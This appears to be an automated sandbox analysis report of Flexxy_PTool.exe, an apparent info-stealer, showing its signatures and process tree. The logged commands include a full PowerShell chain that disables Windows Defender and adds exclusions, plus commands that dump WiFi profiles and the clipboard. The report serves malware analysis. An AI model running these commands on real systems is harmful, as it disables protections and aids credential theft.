Analysis
- max time kernel: 145s
- max time network: 155s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 25-05-2024 14:50
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://ufile.io/pk7dnmlo
Resource
win10v2004-20240508-en
General
-
Target
https://ufile.io/pk7dnmlo
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
pid | process
2328 | powershell.exe
6028 | powershell.exe
5108 | powershell.exe
5884 | powershell.exe
1320 | powershell.exe
1188 | powershell.exe
-
Drops startup file 4 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe | Flexxy_PTool.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe | Flexxy_PTool.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe | Flexxy_PTool.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe | Flexxy_PTool.exe
-
Loads dropped DLL 64 IoCs
Processes:
pid | process
5396 | Flexxy_PTool.exe
2632 | Flexxy_PTool.exe
-
Processes:
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
Processes:
flow | ioc
233 | discord.com
234 | discord.com
198 | raw.githubusercontent.com
199 | raw.githubusercontent.com
229 | raw.githubusercontent.com
211 | discord.com
231 | discord.com
205 | discord.com
207 | discord.com
210 | discord.com
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
196 | api.ipify.org
197 | api.ipify.org
209 | api.ipify.org
227 | api.ipify.org
228 | api.ipify.org
232 | api.ipify.org
-
Detects Pyinstaller 1 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Flexxy_PTool.exe | pyinstaller
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
-
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{BF2B78E5-11BC-44D4-91F4-8D96925D1FEF} | msedge.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
5396 | Flexxy_PTool.exe
4124 | powershell.exe
5664 | powershell.exe
2328 | powershell.exe
6028 | powershell.exe
1320 | powershell.exe
5780 | taskmgr.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
-
Suspicious use of FindShellTrayWindow 45 IoCs
Processes:
pid | process
5812 | 7zG.exe
5780 | taskmgr.exe
-
Suspicious use of SendNotifyMessage 44 IoCs
Processes:
pid | process
5780 | taskmgr.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://ufile.io/pk7dnmlo
1⤵
PID:2868
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --field-trial-handle=4268,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=3980 /prefetch:1
1⤵
PID:772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --field-trial-handle=4888,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4048 /prefetch:1
1⤵
PID:1228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --field-trial-handle=5240,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5272 /prefetch:1
1⤵
PID:1984
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=5420,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:8
1⤵
PID:3644
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --field-trial-handle=5452,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5460 /prefetch:8
1⤵
PID:2440
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5956,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5760 /prefetch:8
1⤵
PID:4548
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6256,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:8
1⤵
PID:640
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6348,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6304 /prefetch:8
1⤵
- Modifies registry class
PID:4704
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --field-trial-handle=5920,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6068 /prefetch:1
1⤵
PID:4324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --field-trial-handle=6456,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:1
1⤵
PID:3988
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --no-appcompat-clear --field-trial-handle=6876,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6912 /prefetch:8
1⤵
PID:5216
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --enable-dinosaur-easter-egg-alt-images --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --field-trial-handle=6576,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=6940 /prefetch:1
1⤵
PID:5224
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7352,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7360 /prefetch:8
1⤵
PID:5288
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5752,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8
1⤵
PID:5408
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=5688,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=7396 /prefetch:8
1⤵
PID:5780
-
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5836
-
C:\Users\Admin\Downloads\Flexxy_PTool.exe
"C:\Users\Admin\Downloads\Flexxy_PTool.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5880
-
C:\Users\Admin\Downloads\Flexxy_PTool.exe
"C:\Users\Admin\Downloads\Flexxy_PTool.exe"
2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5396
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
3⤵
PID:5508
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
3⤵
- Suspicious use of WriteProcessMemory
PID:5960
-
C:\Windows\System32\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:6024
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
3⤵
- Suspicious use of WriteProcessMemory
PID:6084
-
C:\Windows\system32\netsh.exe
netsh wlan show profiles
4⤵
PID:5196
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
3⤵
- Suspicious use of WriteProcessMemory
PID:3012
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
3⤵
- Suspicious use of WriteProcessMemory
PID:5648
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5664
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
3⤵
- Suspicious use of WriteProcessMemory
PID:4136
-
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3360
-
C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name
3⤵
PID:116
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
3⤵
- Suspicious use of WriteProcessMemory
PID:4872
-
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
4⤵
- Detects videocard installed
PID:3372
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
3⤵
- Suspicious use of WriteProcessMemory
PID:5252
-
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
4⤵
PID:1372
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
3⤵
- Suspicious use of WriteProcessMemory
PID:4724
-
C:\Windows\System32\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
4⤵
PID:2028
-
C:\Users\Admin\Downloads\Flexxy_PTool.exe
"C:\Users\Admin\Downloads\Flexxy_PTool.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3400
-
C:\Users\Admin\Downloads\Flexxy_PTool.exe
"C:\Users\Admin\Downloads\Flexxy_PTool.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2632
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
3⤵
PID:4776
-
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap6550:86:7zEvent20435 1⤵
- Suspicious use of FindShellTrayWindow
PID:5812
-
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4 1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5780
-
C:\Users\Admin\Downloads\Flexxy_PTool.exe
"C:\Users\Admin\Downloads\Flexxy_PTool.exe" 1⤵
- Suspicious use of WriteProcessMemory
PID:5620
-
C:\Users\Admin\Downloads\Flexxy_PTool.exe
"C:\Users\Admin\Downloads\Flexxy_PTool.exe" 2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:5840
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver" 3⤵
PID:4420
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid" 3⤵
- Suspicious use of WriteProcessMemory
PID:5220
-
C:\Windows\System32\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid 4⤵
PID:1152
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" 3⤵
- Suspicious use of WriteProcessMemory
PID:2796
-
C:\Windows\system32\netsh.exe
netsh wlan show profiles 4⤵
PID:3372
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" 3⤵
- Suspicious use of WriteProcessMemory
PID:2632
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard 4⤵
PID:2304
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" " 3⤵
PID:2076
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend 4⤵
PID:3164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData" 4⤵
- Command and Scripting Interpreter: PowerShell
PID:5108
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local" 4⤵
- Command and Scripting Interpreter: PowerShell
PID:5884
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" 4⤵
- Command and Scripting Interpreter: PowerShell
PID:1188
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption" 3⤵
PID:4948
-
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption 4⤵
PID:2784
-
C:\Windows\System32\Wbem\wmic.exe
wmic cpu get Name 3⤵
PID:4128
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" 3⤵
PID:404
-
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name 4⤵
- Detects videocard installed
PID:5452
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" 3⤵
PID:5448
-
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory 4⤵
PID:5536
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid" 3⤵
PID:3140
-
C:\Windows\System32\wbem\WMIC.exe
C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid 4⤵
PID:4528
Network
MITRE ATT&CK Enterprise v15
Downloads